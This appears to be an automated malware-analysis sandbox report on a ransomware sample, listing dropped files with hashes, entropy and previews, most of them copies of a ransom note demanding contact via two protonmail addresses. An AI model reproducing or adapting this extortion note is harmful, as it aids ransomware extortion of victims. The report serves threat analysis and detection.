                  SHA1:D258898827028A6DA991387D7652D7FFDEB86DE2
                  SHA-256:D0712B7EB9B77DC3F78C24E53BF261574A6338E4F5991463DD52E81E6C429762
                  SHA-512:0ACFD282C10555BD034B447EBB55E0A943F8383EC9F16044C4366AB2631B2E48AB10726FC4452638535B8F6F2F8447D12E5563802C5D0C0AC999A45B3F977A2E
                  Malicious:true
                  Preview: .&.".Ow..kV...m......./...9...>.bj.Q78.G....F......4.{......B0.zR.U.%.....g&Cf._..<t[....(b....1....I..y =.Q.-...r..Q.XcC{.gUg%n..b....w.......).=...9.cF....q0..28....$..1.F..|Z.\8. Wo})...l..+.Uq.-.".GA..P.hL./N\.u.T.x.I.p...%....q,..u.NlAH...7.F.C...p.....\.pb(..1...y%6..*..#.K=~..y...........R..10W....".?...!y.W...4..*J.{.........%.... .R.F....[1.@^Dv....@.4Q.8...|F0Y=~uI.+f6.....3...pr.X^"..yoky..E...&FW........<........j'.0{......I..V.-.....E/Q...W.=....d.....p.'..ho.x.]]8...7sLj.f...@&.K`.9....;rUV}...l2..S... x.R.2.....|....<m.t.eZH.nqqAb<....*....oG.pT...^.....!.eG.....I...>+B...;..&..=..).......6.V#....}.....h.g..f..j.XQ..(.....JL$.E.L..^._......h.kE...FX.x|Z.....=...Jh.L...;....m.I..Q .\\2...X.8...*...$.*..0=E.FT.....dsl...;.!....8.LSa.KP.F..0zr.RT.m\.\B........Q4....1;Pu..aW+...:..7.c.L..^.e....I...:..;....S-.s.P...^.F..}.J.d.;..I.Ub.V......-o..~..j0 ..C.......{......=.yv.7.JW....5.O`...m....).Y#......x.......\...
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9946818573106775
                  Encrypted:true
                  SSDEEP:1536:mYz8uSMbjrcgaYSmPHkiBWG30ame+Fh2kanRt3ADwMNMqx+340N2YYuZ2OyPbcoa:/zmVK0r2Z5hq85NcY2pbcHtII
                  MD5:86BA7E3A653E5C9927E3D89160B98E1B
                  SHA1:B992FEA9B1E5185D66764862DB58CDD600291E88
                  SHA-256:077D8906F61D18D8EEFBEE0EA893DBEDDCDD114787D991C30CE0E933B67BBFAE
                  SHA-512:7D0F7207AE63BFB966ECAE0B9AD38E4848A920E6518BAACC8D734A359D005FA540325FEB3995AEAEDCCB0A3D8B0A11A5D962F1E98BC5EACE16EA00193C055C35
                  Malicious:true
                  Preview: .7..O...o.......]}+..P.G.a.>.Of...$s .....U.....B&.C.z..nMm...6.....Wy(..8<....TV........7....ZJ..Q*.g...~.h1..f...R..7........6..dLUkF..)....:......_b..._.r..rI_5.C..p..Y?.n....dw(.e...a.....m...+...n..8..Fv.y....L..IU...<X.U..>..k...... . C...N.nG.w.h..t.KF.."&b..Oc$..J....3w.g..p1O...p.d...P>...."..LW.....V..y...W`$.7e..B......bR8oW..R...Hgp......4.K.h......~A..".-H......kW...y..H...o..Uf'M.n..RZ{.N.W.P.Rg:..PLh...f.".z......>..D :.(.!.....{.qg..]...>.......'$.....'6X..S-S..5.+.....<.......3o......,.$.zh.../....{......X.[c....i.N....|..4.*.8..F......G[S....'V..u...!.x.'._7.7.p.M.*.......{...k.d...ow.55>R'V..f.....+1.r8......T@..d\X.&..D8.w.g@.2......3.......y..Rm..(.pDI.w.^.....<A..0.,.......<.....#.~.H..n.sj.O..".S..r......\?...zF].e...q....?..1.e.@.u...0..<.....Fw.=.0..~=}...A.{.Y..r..m.W:|..+..%....#@....y..k C.M.s.{!$Z7.L(.h.....b+Ns.*Ct.!..v..&......@.nqT}.c.....)dXq.qQ.l/..........X.|.........Y..LpB6i.`#.!6.i........Z.\=`.....k.
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\ActiveSync\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.681825778426808
                  Encrypted:false
                  SSDEEP:192:DjDzd3hy5DWKkjRu/jbQg2596pAZ6MKmPGQhGyfSbSZOvqqDu3zIAUJ:nvdAHYurF2HnZ6fmeQhGy+zvquu+J
                  MD5:B4F7974E96817FD9AE48CA7DDB21D08C
                  SHA1:EF71E7B8F6171A0D578617518DC42EF048E33BFD
                  SHA-256:FD5A5C473C16F83C0A7813651256CCB24CF97B4B0193CD3CA19754FAE3FB39A1
                  SHA-512:1BAEDE0627515C878FDC18C72C8A71A305B0CA08D6C3245F036D8EB1C66E947BCC045B73F6DC3AD2621E05F94CCC520DCFCCA6C993FB2EEC103EAED61556EDCF
                  Malicious:false
                  Preview: FQ..yD..&...H...l-..{.K..D..-.[._.e&.m......Y#.%PW......=.?.k..9.;....k.%.E?.]..h.g...r..+.c..~...*.6..3#...#%..K.2 .,.....B@....Q..;0....1....iNr.l.b...2C... ..tOx."..].......t....E..W.N=..E(..m..T.!.....5...mI.w0..b.+....i.{..C.OOj.4$yVc.Ty..G..i....>.-.~.r......W3C)@....C..k+..*..wP..Q.U!F.%'v6.......`{...8.L..6.-.Zw..'.f.....l.A..8......X6...!!........Z..z..=...[...A.4.z.c....Q. wyt..w.r.3zV..P.xz....m..mK.)"Wn..MT..S.-..&.q.....+5......}u'Et..n 4E.y...f.%....L....=.t........b.d.!.....Y......p.mE....L.m......|.?m..Qc.....;......b8J.;. ....B...Nt,a..N....q.7.B........g.......q...`....+.Ld+.51.2J.R.. 1..q..$.....0.......f?*/..f.|C..../....>.i.l.!.....b...........O0..l..`..0......;.om>.V...e...V6[M8..."D..-R..Z...]...........(.M.$.. ....@]...-....g....|...98....|.9.....um3.z8{.zi.W...VQi.w?swo...w..yH..R.Krp.=.r7.....h.i36..}....%.....X...........Y. ......:R...^....fk..J...yx._.p.i......(_w.........4IX.~....ez..\.Z.p.3...H.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
